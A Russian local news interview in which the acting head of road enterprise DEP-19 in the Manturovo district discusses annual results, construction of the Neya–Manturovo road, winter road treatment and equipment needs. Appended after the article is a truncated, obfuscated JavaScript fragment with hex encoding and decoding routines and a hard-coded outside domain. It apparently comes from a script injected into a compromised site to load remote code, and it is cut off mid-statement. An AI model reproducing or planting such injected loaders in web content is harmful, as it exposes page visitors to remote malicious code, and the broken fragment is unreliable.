На дорогах района: С перевыполнением

На дорогах района: С перевыполнением

плановых заданий по строительству, ремонту и содержанию дорог поработал коллектив ДЭП-19
В минувшем году дорожниками получена значительная прибыль, которая будет направлена на дальнейшее развитие предприятия. На днях мы встретились с исполняющим обязанности директора Андреем Писцовым и попросили рассказать о том, чем сегодня живут дорожники.
— Андрей Валерьевич, новый год принёс немало волнений в связи со снегопадами. А есть ли положительные факторы?
— В начале февраля экономическая служба подвела итоги года. Они порадовали. Всего в минувшем году предприятием освоено более 188 млн руб. Это больше чем в 2 раза превышает показатели прошлых лет. Самым значительным объектом в конце минувшего года было строительство дороги на участке Нея — Мантурово, на этот объект из бюджета выделено более 86 млн руб. Производились ремонты на дорогах в Межевском, Пыщугском районах, устранение колейности в Мантуровском районе. Выполнены работы по контрактам, по ремонту автомобильных дорог в черте города, а также на территории НАО «СВЕЗА — Мантурово».
— Когда завершатся работы на участке дороги Санкт-Петербург — Екатеринбург?
— На нейской дороге сдано в эксплуатацию 7 км в асфальтном исполнении. Остался участок протяжённостью 9 км в Мантуровском районе. В этом году планируют выделить ещё деньги на завершение строительства. Вновь будем выходить на торги, чтобы продолжить строительство. Участок достаточно протяжённый, кроме всего прочего, там два железобетонных моста, которые пришли в негодность и требуют серьёзного ремонта.
— Нынешняя зима — вообще беда для дорожников…
— Это действительно так. Дороги обрабатываются пескосоляной смесью, а как известно, это не только польза, но и вред, поскольку разъедает и асфальт, и железо. На сегодня дороги вновь приходится приводить в порядок. На прошлой неделе мы запустили рециклер, маленький асфальтобетонный заводик на колесах. Производительность у него не очень большая 3-4 т в смену. приступили к работам и выехали на автодорогу Кострома — В.-Спасское возле Угор. Конечно, это не панацея, весь ремонт дорог рециклером сейчас не проведём, но самые опасные участки ликвидируем.
Кроме этого, каждый день работаем по заявкам с поселениями, производим расчистку дорог в сельских населённых пунктах. Администрации поселений за работу рассчитываются исправно, и мы идём им на встречу. Система в этом вопросе отработана, но самое печальное, что сбои даёт техника. Сегодня на трассах занято 8 КДМ, 3 автомашины с плужком, 2 грейдера и грейдозер.
Пескосоляной смеси на подсыпку дорог ушло 5100 т, это годовая норма. В этом году дополнительно получили ещё140 т соли, сейчас занимаемся приготовлением этой смеси.
— Как уже сообщалось, Мантуровский ДЭП — один из немногих в области — закончил год с прибылью. Как планируете распорядиться ею?
— Поощрили работающих по итогам года, заплатим все налоги… Все наши доходы, в основном, идут на приобретение запчастей. В прошлом году произвели замену оборудования. Сейчас острая потребность в грейдерах, погрузчиках. По возможности, автопарк будем обновлять. Сейчас активно ведём ремонт асфальтобетонного завода, решаем вопросы по обеспеченности материалами, некоторые уже завозим. И конечно же, основной упор делаем на зимнее содержание дорог и подготовку к ежегодной битве — летнему сезону.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gpko-avangard.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e